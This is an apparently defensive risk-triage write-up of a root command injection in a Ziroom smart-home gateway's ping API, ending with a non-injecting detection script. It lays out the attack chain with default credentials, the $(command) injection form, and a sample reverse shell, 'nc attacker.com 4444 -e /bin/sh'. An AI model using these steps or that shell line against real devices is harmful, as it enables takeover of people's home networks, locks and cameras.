Like leaving the master key under the doormat of a building nobody in your city lives in
The Ziroom ZHOME A0101 (ZH-A0101) is an OpenWrt-based smart-home gateway shipped exclusively into Ziroom-managed rental apartments across mainland China. Firmware 1.0.1.0 (Build 202004151405) exposes a LuCI web API on the LAN at 192.168.18.1. CVE-2026-102794 targets the POST /api/ZRnetwork/ping endpoint: the url parameter is concatenated directly into a shell ping command in zrNetwork.lua (line 1112) without sanitization, so $(arbitrary_command) achieves full OS command execution as root. Affected: firmware ≤ 1.0.1.0. No patched firmware exists — the vendor is unresponsive.
The vendor-assigned CVSS 3.1 of 9.1 CRITICAL dramatically overstates the real-world enterprise risk. The vector itself encodes PR:H — the exploit's own PoC confirms you must authenticate as root via HTTP Basic Auth and obtain a session token (stok) before reaching the vulnerable endpoint. The 'network' attack vector is misleading: the management interface sits on a private LAN, not the public internet. Ziroom is a China-domestic rental platform with zero deployment in Western or global enterprise networks. Even within Ziroom's ecosystem, exploiting this requires LAN access to one apartment's gateway — the blast radius caps at that apartment's IoT devices and /24.
4 steps from start to impact.
Gain LAN access to the apartment network
192.168.18.1 on the apartment's private LAN. The attacker must be on the same Layer 2 segment — physically present, connected via a compromised IoT device, or via rogue Wi-Fi association. No internet-facing exposure has been documented on Shodan, Censys, or FOFA.- Physical or wireless proximity to the specific Ziroom apartment
- The target apartment must contain a ZHOME A0101 gateway
- Enterprise networks do not deploy this device
- Attacker must target a specific Chinese rental apartment
- Device is not internet-facing — LAN-only at 192.168.18.1
http.title:"Ziroom" returns negligible results.Authenticate as root on the LuCI web interface
root account and extraction of a stok session token. The PoC from researcher 'Waltz' uses username=root&password=admin (factory default). The login endpoint is POST /cgi-bin/luci. If default credentials have been changed, this step fails entirely.- Default credentials unchanged (root/admin), or possession of valid admin credential
- Network reachability from Step 1
- PR:H authentication gate — not pre-auth
- If credentials are changed from factory defaults, the chain breaks completely
- No credential-stuffing path — only one known default pair
/tmp/log/ on the device; no SIEM integration exists.Send command-injection payload to /api/ZRnetwork/ping
stok token, the attacker POSTs to /cgi-bin/luci/;stok=<TOKEN>/api/ZRnetwork/ping with url=$(arbitrary_command). The Lua handler concatenates input directly into ping "..url.." -c 1 -W 1 |grep avg, executing the injected command via shell substitution. The web process runs as root. Weaponized tool: curl with the waltz-sketch PoC payloads.- Valid authenticated session from Step 2
- The /api/ZRnetwork/ping endpoint is enabled (default)
- Trivial once authenticated — single curl command
- Public PoC on GitHub (waltz-sketch/Ziroom)
Establish persistence or pivot on the apartment LAN
nc attacker.com 4444 -e /bin/sh), read Wi-Fi credentials, DHCP leases, and connected-device MACs, or pivot to other devices on the apartment /24. Blast radius: smart locks, cameras, thermostats, personal devices on the same Wi-Fi.- Successful command execution from Step 3
- Outbound connectivity for C2 callbacks
- Blast radius is one apartment's LAN — no domain, no AD, no fleet
- No enterprise-scale lateral movement possible
- Gateway has limited storage for persistent implants
root/admin creds. Changing the password breaks Step 2, eliminating the exploit path. As a LOW verdict, there is no noisgate mitigation SLA — treat as backlog hygiene./cgi-bin/luci/*/api/ZRnetwork/ping at the device's upstream firewall or via iptables on the device. Eliminates the specific injection vector entirely.- Enterprise EDR/AV: The device runs embedded OpenWrt Linux — no endpoint agent can be installed. EDR is irrelevant.
- Cloud/enterprise WAF: The management interface is on a private LAN IP, not behind a reverse proxy. A WAF will never see this traffic.
- Firmware patching: No patch exists. Vendor is unresponsive. No firmware update mechanism addresses this CVE.
- Vulnerability scanning (Nessus/Qualys/Rapid7): No detection plugins exist for this device. It will not appear in enterprise scan results.
The supporting signals.
| In-the-wild exploitation | No known exploitation. Not on CISA KEV. No campaigns observed. No GreyNoise tags. |
|---|---|
| Proof-of-concept | Public. Full PoC with curl commands by researcher Waltz at waltz-sketch/Ziroom. Includes auth, file creation, id output, and reverse-shell payloads. Not on pocindex.io. No Nuclei template, no Metasploit module. |
| EPSS score | Not yet scored — CVE published 2026-09-29; EPSS typically lags 24–72 hours. Expected low given niche device and no exploitation history. |
| KEV status | Not listed. No CISA KEV entry as of 2026-09-30. |
| CVSS vector | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H → 9.1 Critical. PR:H = admin auth required. S:C = gateway → LAN pivot. CVSS 4.0: 9.4 per VulDB. |
| Affected versions | Ziroom ZHOME A0101 (ZH-A0101) firmware ≤ 1.0.1.0 (Build 202004151405). No other firmware versions documented. |
| Fixed versions | None. Vendor unresponsive — no patch, no advisory, no firmware update path. |
| Scanning / exposure | No Shodan/Censys/GreyNoise/FOFA footprint. Management interface at private LAN 192.168.18.1. Shodan dork http.title:"Ziroom" returns negligible hits. No Nessus/Qualys/Rapid7 detection plugins. |
| Disclosure date | 2026-09-29 (VulDB submission #914644). CVE published 2026-09-30. NVD analysis pending. |
| Researcher | Waltz (GitHub: waltz-sketch). Submitted via VulDB. Also filed CVE-2026-102792 and CVE-2026-102793 for adjacent endpoints on the same device. |
Sources.
Why this verdict
- Near-zero enterprise installed base: The ZHOME A0101 is a consumer IoT gateway deployed exclusively in Ziroom-managed Chinese rental apartments. The probability that a Western enterprise fleet contains even one is effectively zero.
- LAN-only reachability (−2.0): The management interface at
192.168.18.1is not internet-facing. The CVSSAV:Nis technically correct but misleading — the 'network' is one apartment's /24. No Shodan/Censys exposure. Attacker needs physical/wireless proximity. - PR:H authentication gate (−1.5): Exploit requires root-level HTTP Basic Auth plus session token. Factory defaults (
root/admin) soften this, but CVSS correctly flagsPR:H. This is post-auth command injection, not pre-auth RCE. - Single-apartment blast radius (−2.0): Successful exploitation compromises one apartment's IoT devices and LAN. No lateral movement to domain, fleet, cloud tenant, or supply chain.
S:Creflects gateway-to-LAN pivot only. - Role multiplier: This device occupies no high-value enterprise role. It is not an identity provider, hypervisor, CI/CD system, backup server, network edge appliance, SIEM, OT controller, or domain controller. It is a consumer smart-home hub for lights, locks, and thermostats. The high-value role floor does NOT apply. Blast radius: apartment LAN → handful of IoT devices and personal endpoints.
Why not higher?
To reach MEDIUM, we would need either meaningful enterprise deployment or a realistic path to fleet-scale impact. Neither exists. The device is absent from enterprise asset inventories globally. The chain requires physical/LAN proximity to a specific Chinese apartment, admin credentials, and yields only apartment-level compromise. No high-value role floor applies — the device is consumer IoT with zero enterprise-infrastructure overlap.
Why not lower?
The vulnerability is real, the PoC is public and trivial with default credentials, the vendor is unresponsive with no patch, and command injection as root on a LAN gateway enables apartment-level lateral movement. For organizations operating Ziroom properties or conducting IoT assessments, this is a legitimate finding. It does not merit IGNORE because the technical impact within its limited scope is genuine.
Crowdsourced verification payload.
Run from any Linux/macOS host on the same LAN as the ZHOME A0101 gateway. Usage: bash check_cve_2026_102794.sh 192.168.18.1. No privileges required — it only attempts HTTP requests to detect the vulnerable endpoint and default credentials. Does NOT inject commands.
#!/usr/bin/env bash
# check_cve_2026_102794.sh — Detect CVE-2026-102794 (Ziroom ZHOME A0101 ping cmd injection)
# Usage: bash check_cve_2026_102794.sh <target_ip>
# Output: VULNERABLE / PATCHED / UNKNOWN
# Requires: curl, grep
# Does NOT exploit the vulnerability — only checks endpoint reachability and default creds.
set -euo pipefail
TARGET="${1:-192.168.18.1}"
PORT="${2:-80}"
BASE="http://${TARGET}:${PORT}"
RESULT="UNKNOWN"
echo "[*] CVE-2026-102794 checker for Ziroom ZHOME A0101"
echo "[*] Target: ${BASE}"
# Step 1: Check if the device is reachable
if ! curl -s -o /dev/null -w '' --connect-timeout 5 "${BASE}/" 2>/dev/null; then
echo "[-] Target unreachable at ${BASE}"
echo "UNKNOWN"
exit 2
fi
echo "[+] Target is reachable"
# Step 2: Attempt login with default credentials
LOGIN_RESP=$(curl -s -D - -o /dev/null --connect-timeout 10 \
-X POST "${BASE}/cgi-bin/luci" \
-d "username=root&password=admin" \
-L 2>/dev/null || true)
STOK=$(echo "${LOGIN_RESP}" | grep -oP 'stok=\K[^/;\r\n]+' | head -1 || true)
COOKIE=$(echo "${LOGIN_RESP}" | grep -i '^set-cookie:' | grep -oP 'sysauth=[^;]+' | head -1 || true)
if [ -z "${STOK}" ] || [ -z "${COOKIE}" ]; then
echo "[-] Default credentials (root/admin) rejected or login endpoint differs"
echo "[*] Device may exist but default creds changed — not directly exploitable"
echo "UNKNOWN"
exit 2
fi
echo "[!] Default credentials ACCEPTED — stok token obtained"
# Step 3: Check if the vulnerable endpoint exists (safe probe, no injection)
PING_RESP=$(curl -s -o /dev/null -w "%{http_code}" --connect-timeout 10 \
-X POST "${BASE}/cgi-bin/luci/;stok=${STOK}/api/ZRnetwork/ping" \
-b "${COOKIE}" \
--data-urlencode "url=127.0.0.1" 2>/dev/null || echo "000")
if [ "${PING_RESP}" = "200" ]; then
echo "[!] /api/ZRnetwork/ping endpoint EXISTS and responds"
echo "[!] Firmware is vulnerable to CVE-2026-102794 (no patch exists)"
RESULT="VULNERABLE"
elif [ "${PING_RESP}" = "404" ] || [ "${PING_RESP}" = "403" ]; then
echo "[+] /api/ZRnetwork/ping returned ${PING_RESP} — may be disabled"
RESULT="PATCHED"
else
echo "[?] Unexpected HTTP ${PING_RESP} from ping endpoint"
RESULT="UNKNOWN"
fi
echo "${RESULT}"
case "${RESULT}" in
VULNERABLE) exit 1 ;;
PATCHED) exit 0 ;;
*) exit 2 ;;
esac